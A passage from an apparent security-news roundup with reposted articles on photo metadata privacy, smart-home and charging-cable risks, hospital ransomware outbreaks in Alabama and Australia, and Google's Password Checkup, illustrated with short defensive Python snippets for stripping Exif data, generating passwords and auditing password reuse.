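In a JPEG, that embedded location data lives in the file’s Exif metadata, stored in so-called APP1 segments near the start of the file. As an illustration of how stripping works, here is a simplified, standard-library-only Python sketch that drops APP1 segments from a JPEG’s header (real tools like exiftool, or re-exporting from an image editor, handle many more cases):

```python
def strip_app1(jpeg: bytes) -> bytes:
    """Remove APP1 (Exif/XMP) metadata segments from a JPEG byte string.

    Simplified sketch: walks the marker segments before the image data,
    copies everything except APP1, and passes the scan data through as-is.
    """
    assert jpeg[:2] == b"\xff\xd8", "not a JPEG"
    out = bytearray(b"\xff\xd8")
    i = 2
    while i < len(jpeg):
        if jpeg[i] != 0xFF:
            break  # malformed header; stop rewriting
        marker = jpeg[i + 1]
        if marker == 0xDA:        # start-of-scan: image data follows
            out += jpeg[i:]       # copy the rest verbatim
            break
        # every header segment carries a 2-byte big-endian length
        length = int.from_bytes(jpeg[i + 2:i + 4], "big")
        if marker != 0xE1:        # keep everything except APP1 (Exif)
            out += jpeg[i:i + 2 + length]
        i += 2 + length
    return bytes(out)
```

In practice you’d reach for a dedicated tool, but the principle is the same: the GPS coordinates are just bytes in the file, and removing them before upload keeps them out of anyone else’s hands.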
How is this dangerous? Well, information such as knowing where you work or which road you live on can help someone run an identity theft scam, or get past security questions on your online accounts, or visit you in person when you’d rather not see them. The less your public photos say about you, the better.
Smart Home Snooping
Our homes are getting smarter, which gives hackers and malware peddlers a whole new set of devices to try and target—the end result could be doors that don’t stay locked or home security camera footage that’s viewed by more people than you’d like.
Keeping your smart home secure starts with what you buy: It’s a good idea to stick to well-known, established brands with a strong track record in hardware, as much as possible. After that, make sure both your smart home devices and your router—which acts as a gateway to them all—are kept up to date with the latest software. Most reputable smart home devices do this automatically, another good reason to stick with brands you trust.
If your smart home devices and accounts do need passwords, make sure you don’t stick with the default. Instead, pick a long and difficult-to-guess password that you aren’t using anywhere else, and turn on two-factor authentication, if available, as an extra layer of protection.
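A password like that is easy to generate programmatically; for example, Python’s `secrets` module draws from the operating system’s cryptographically secure random source, which is essentially what a password manager’s built-in generator does:

```python
import secrets
import string

def make_password(length: int = 20) -> str:
    """Generate a random password from letters, digits, and punctuation
    using the OS's cryptographically secure random source."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

The point of `secrets` over the ordinary `random` module is that its output isn’t predictable from previous values, which matters for anything security-related.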
Malicious Charging Cables
The standard charging cables that come with your gadgets are designed to power them up, and perhaps sync some music when needed—but specially engineered cables that look very similar can do much more than that.
Consider the fake Lightning cables that can now be mass-produced: they look just like the genuine product, but they can give hackers remote access to a device once plugged in. All the end user has to do is use a doctored cable and then agree to “trust this computer,” a common alert that’s easy to dismiss without a thought.
The fix is to only use the cables that come with your devices, or from reputable sources—something you should do anyway for the well-being of your gadgets. As with USB sticks, don’t assume any cable that you find lying around is legit.
Read the original article courtesy of Wired.com.
Ransomware forces 3 hospitals to turn away all but the most critical patients
“A criminal is limiting our ability to use our computer systems,” hospital officials warn.
Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.
All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system. The hospitals—DCH Regional Medical Center in Tuscaloosa, Northport Medical Center, and Fayette Medical Center—are turning away “all but the most critical new patients” at the time this post was going live. Local ambulances were being instructed to take patients to other hospitals when possible. Patients coming to DCH emergency rooms faced the possibility of being transferred to another hospital once they were stabilized.
“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”
Details about the specific strain of malware weren’t immediately available. Typically, the malware encrypts production and backup hard drives used to store data and run computer systems. Victims can only receive the decryption key needed to restore systems after paying a ransom, usually using bitcoin or another cryptocurrency. In some cases, it’s possible to decrypt data without paying the ransom. In other cases, it’s impossible.
At least seven hospitals in Australia, meanwhile, were also feeling the effects of a ransomware attack that struck on Monday. The hospitals in Gippsland and southwest Victoria said they were rescheduling some patient services as they responded to a “cyber health incident.”
“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management,” hospital officials said. “Hospitals have isolated and disconnected a number of systems… to quarantine the infection.”
Hospital officials said they’re working with police and the Australian Cyber Security Centre to manage the incident. According to news reports, hospital computer systems remained locked down at seven hospitals on Tuesday, more than 24 hours after the attack struck. An official said it would take weeks to secure and restore damaged networks. The official said there was no indication that patient records had been accessed.
There was no immediate indication that the attacks in Alabama and Australia were related. One of the most memorable times hospitals were widely reported to be hamstrung by ransomware attacks was in the wake of the WannaCry ransom worm outbreak in May 2017 and, to a lesser extent, the NotPetya attack that followed two months later.
Read the original article courtesy of ArsTechnica.com.
Google’s Password Manager Now Warns About Compromised Accounts
Google’s Password Manager Checkup feature is now integrated directly into your Google Account and will warn you if your saved passwords have security issues, such as being weak or having been compromised in data breaches.
In February, Google released the Password Checkup Chrome extension that alerts you when your saved logins were found in data breaches and then prompts you to change your password.
Starting today, Google has integrated the Password Checkup tool directly into Google Password Manager. This means you can check whether your passwords are secure with the click of a button in your Google Account.
To access the Password Checkup tool, you simply go to your Google Password Manager at https://passwords.google.com and click on the Check passwords link.
Google will then check your saved login credentials against the following criteria:
- Whether the credentials have been exposed in a third-party data breach.
- Whether the passwords are being reused across multiple sites.
- Whether the passwords are considered weak and could be easily brute-forced by an attacker.
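Google hasn’t published the internals of this check, but the reuse and weakness criteria are simple to sketch locally. A minimal, hypothetical Python audit over a `{site: password}` mapping (the breach-exposure check additionally requires querying a breach corpus, which is out of scope for this sketch):

```python
from collections import Counter

# Tiny stand-in list; real checkers use corpora of millions of common passwords.
COMMON = {"password", "123456", "qwerty", "letmein"}

def audit(credentials: dict[str, str]) -> dict[str, list[str]]:
    """Flag sites whose passwords are reused or weak."""
    counts = Counter(credentials.values())
    report: dict[str, list[str]] = {"reused": [], "weak": []}
    for site, pw in credentials.items():
        if counts[pw] > 1:                       # same password on 2+ sites
            report["reused"].append(site)
        if len(pw) < 12 or pw.lower() in COMMON:  # short or well-known
            report["weak"].append(site)
    return report
```

The length-12 threshold and the tiny common-password list are illustrative assumptions, not Google’s actual criteria.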
After performing the check, Password Checkup will display the categories of risk that apply to your passwords: compromised passwords, reused passwords, and weak passwords.
You can then click on a category to get a list of problematic passwords and change them to more secure ones.
Google is not stopping there, though.
As we reported in August, Google also plans on having Google Chrome alert you if your saved passwords were found in data breaches.
While this feature is still experimental, it shows that Google aims to provide a free, full-featured password manager that can compete with many paid offerings.
Read the original article courtesy of BleepingComputer.com.